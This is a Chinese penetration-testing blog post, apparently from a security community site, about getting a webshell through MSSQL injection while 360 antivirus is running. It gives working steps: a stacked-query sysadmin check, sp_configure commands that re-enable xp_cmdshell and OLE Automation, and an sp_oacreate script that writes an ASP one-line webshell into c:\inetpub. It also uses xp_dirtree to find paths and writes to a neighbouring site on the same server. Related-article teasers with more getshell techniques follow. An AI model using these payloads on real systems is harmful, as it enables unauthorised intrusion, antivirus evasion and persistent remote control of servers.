Mssql绕过360拿到webshell

VSole2022-08-23 16:09:39

0x01 存在注入

https://www.cnblogs.com/zpchcbd/p/12167244.html

通过堆查询延迟注入，判断是dbo的权限

;if(selectIS_SRVROLEMEMBER('sysadmin'))=1WAITFOR DELAY'0:0:05'--

那么直接通过sqlmap来进行执行命令 --os-shell，发现

[18:39:23] [INFO] checking if xp_cmdshell extended procedure is available, please wait..xp_cmdshell extended procedure does not seem to be available. Do you want sqlmap to try to re-enable it? [Y/n] Y
[18:39:25] [WARNING] xp_cmdshell re-enabling failed

通过--sql-shell 来手动开启

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
os-shell> exec master..xp_cmdshell "whoami"

当sqlmap启动xp_cmdshell组件执行失败的时候还会尝试去开启sp_OACreate，手动执行语句为：

EXEC sp_configure 'show advanced options', 1;  
RECONFIGURE WITH OVERRIDE;  EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE WITH OVERRIDE;  EXEC sp_configure 'show advanced options', 0;

但是还是发现执行失败：Command standard output [0]

0x02 提权

在之前信息搜集的时候发现开放的端口有

连接下3389发现确实是有杀毒存在

所知道的利用xp_cmdshell、spsp_OACreate COM组件之类的进行执行命令都会被杀毒拦截，只能从别的方面下手

既然是dbo的权限那么也可以尝试通过差异备份等等的方法来绕过杀毒，这里利用的是存储过程来写文件

declare @o int, @f int, @t int, @ret intexec sp_oacreate 'scripting.filesystemobject', @o outexec sp_oamethod @o, 'createtextfile', @f out, 'c:\inetpub\muma.asp', 1exec @ret = sp_oamethod @f, 'writeline', NULL,'<%execute(request("a"))%>'

因为这里自己已经读到了权限dbo的密码，所以是直接用navicat上直接操作

execute master..xp_dirtree 'c:'        //列出所有c:\文件和目录,子目录 
execute master..xp_dirtree 'c:',1      //只列c:\文件夹 
execute master..xp_dirtree 'c:',1,1    //列c:\文件夹加文件

通过以上的操作来寻找目录的地址，然后通过以上的操作来写文件就可以了

后来通过同服旁站的查询发现另外一个站点上的目录上文件有报错，同样可以发现路径来尝试写到另一个站点上，高权限

webshellsqlmap

本作品采用《CC 协议》，转载必须注明作者和本文链接

一名渗透工程师所必备的技能

2021-09-27 06:03:08

服务器的相关信息（真实ip，系统类型，版本，开放端口，WAF等）网站指纹识别（包括，cms，cdn，证书等），dns记录 whois信息，姓名，备案，邮箱，电话反查（邮箱丢社工库，社工准备等）子域名收集，旁站，C段等 google hacking针对化搜索，pdf文件，中间件版本，弱口令扫描等扫描网站目录结构，爆后台，网站banner，测试文件，备份等敏感文件泄漏等传输协议，通用漏洞，ex

sqlmap --os-shell反制小思路

2021-12-14 16:55:46

之前有看到goby反制和松鼠A师傅蚁剑反制的文章，再想到之前写过sqlmap的shell免杀，觉得思路其实差不多，就写一篇sqlmap的反制吧。

sql注入getshell的几种方式

2022-07-08 08:09:43

介绍几种利用sql注入获取系统权限的方法，一是利用outfile函数，另外一种是利用--os-shell。

Sql注入getshell的几种方式

2022-07-11 08:00:00

介绍几种利用sql注入获取系统权限的方法，一是利用outfile函数，另外一种是利用--os-shell。

干货｜2021最新渗透测试面试题合集！！！

2021-09-19 09:17:15

⽹上整理的⾯试问题⼤全，有些 HW ⾯试的题，已经收集好了，提供给⼤家。

Mssql绕过360拿到webshell

2022-08-23 16:09:39

通过--sql-shell 来手动开启EXEC sp_configure 'show advanced options', 1;当sqlmap启动xp_cmdshell组件执行失败的时候还会尝试去开启sp_OACreate，手动执行语句为：EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'show advanced options', 0;通过以上的操作来寻找目录的地址，然后通过以上的操作来写文件就可以了后来通过同服旁站的查询发现另外一个站点上的目录上文件有报错，同样可以发现路径来尝试写到另一个站点上，高权限

SQLserver写Webshell总结-突破中文路径

2021-10-20 12:47:29

背景目标站：发现授权文件，刷新抓包得到一处ajax请求指向了TicketsSellMainHandler.ashx文件存在注入开始踩坑本来打算通过注入开启XP_cmdshell提权拿到源码进一步进行审计通过dir命令得到该站绝对路径发现是中文绝对路径，这个时候在不考虑powershell上线的方式用echo进行写马已经行不通了 mssql调用cmd默认是gb2312编码，使用sqlmap进

Vulnhub靶机DC系列-DC3(joomla漏洞、sqlmap注入、john 解密)

2023-04-10 09:40:50

option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27单引号尝试：存在sql注入sqlmap 走起！跑数据格式有点问题。获取到管理员加密后的密码$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu使用john 来破解john pwd --wordlist=/usr/share/wordlist/rockyou.txt admin/snoopy 登录后台3x0：后台篇在后台查找一番发现类似于模板的页面可以利用模板的信息在结合上面的端口信息没有ssh应该是从web端进入 webshell?就接着用了4x0：提权篇查看系统的内核版本启动kali上的apache，把exp上传到服务器把exp下载到靶机解压exp授权脚本使用exp报错不影响使用获取到root权限5x0：flag获得

记一次简单的且不完全的从外到内的渗透测试实战

2022-07-28 08:17:58

SQlMAP --os-shell拿下webshell 众所周知，--os-shell的使用条件较为苛刻，必须满足： dba权限网站绝对路径 php中的gpc为off，php为自动转义的状态

VSole

网络安全专家